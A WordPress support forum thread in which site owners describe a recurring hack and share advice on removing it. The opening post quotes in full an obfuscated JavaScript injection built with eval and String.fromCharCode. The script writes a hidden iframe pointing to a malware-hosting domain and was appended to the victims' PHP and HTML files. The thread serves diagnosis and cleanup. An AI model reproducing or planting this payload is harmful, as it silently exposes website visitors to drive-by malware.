WordPress.org

Support

Hacked

  • <script type="text/javascript">eval(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,61,34,115,105,34,59,118,97,114,32,119,51,52,53,61,34,112,108,34,59,118,97,114,32,114,101,54,61,34,97,110,107,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,102,103,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,39,43,39,105,115,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>

    Keeps ending up appended to all the php files and html files directory where my wordpress blog is hosted.

    I found some links that describe the same problem:

    http://linuxsysadminblog.com/2009/03/heurtrojanscriptiframe/#more-432
    http://wordpress.org/support/topic/255476?replies=3#post-1025429

    I noticed this hack a couple of days ago and cleaned all of the affected files, changed the files to read only and changed the passwords on everything. I did it again today.

    This causes Google chrome to give a “hacked” error:

    Warning: Visiting this site may harm your computer!

    The website at retrovision.tv contains elements from the site siplank.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
    For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for siplank.com.

Viewing 12 replies - 1 through 12 (of 12 total)
  • I have this same problem and don’t know how to fix it. 🙁

    also wanted to point out that it is happening to me in Safari, but not Firefox.

    My blog is password protected, but I don’t know how to fix it.

    whooami

    @whooami

    Member

    you do NOT sound like you are having the same problem as the original poster.

    what makes you believe otherwise? I suspect you may need to re-read that post and perhaps start your own thread?

    email me at djmom70 {at} cox {dot} net please.

    I get the exact same error as the previous poster does. Also followed the links he provided and saw that I have the same problem with that long string of script.

    The error does not pop up for me in Firefox, but it does in Safari.

    I’ve spent the last 3 hours trying to figure this out, so I’m pretty sure I’m having the same problem.

    Thank you.

    whooami

    @whooami

    Member

    Im emailing you for the url.

    just emailed you back

    what themes do you use?

    I’m using althuapa, but it happened even when I switched themes.

    For anyone else having this problem, whoami is a great help! I found out that all of my index.htm and index.php had been changed at the same time on the same day and sure enough it had that long code that was in this opening post. I changed all my passwords and removed the bad code. Hopefully all will be well now. I hope this helps anyone else with this issue.

    Hi, I am having the same problem with my site. The attackers have been back at least twice. We are cleaning up the files now.

    Hello,

    I think I’m having a similar problem. Yesterday my site started spitting out the dreaded ‘Visiting this site may harm your computer’ so I did a search through all the files for the javascript mentioned above to no avail. I then found on the diagnostic page a reference to:
    ‘2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including feed2js.org/, feeds.feedburner.com/~s/.’

    Which are components of two different legitimate scripts that I have running for feedburner obviously. The weird thing is, I’ve had these running for a few months and never had any problems. So I just removed them and then requested google to review my site after I’ve removed the problem. Is this all I need to do and just wait for google to get around to reviewing my site? If so, doesn’t this seem odd that google polices the internet? Anyone know how long it might take google to take down this message?

    Site I’m referencing is http://www.vintageglamblog.com

    Any help is appreciated!

    Matt

    check your header.php and footer.php in your current theme,
    you’ll see some script code in there with what looks like just scrambled letters and numbers.
    Delete this and the script tags around it.

    then go through and look at all other files to see if you can find other instances of it.

Viewing 12 replies - 1 through 12 (of 12 total)
  • The topic ‘Hacked’ is closed to new replies.
Skip to toolbar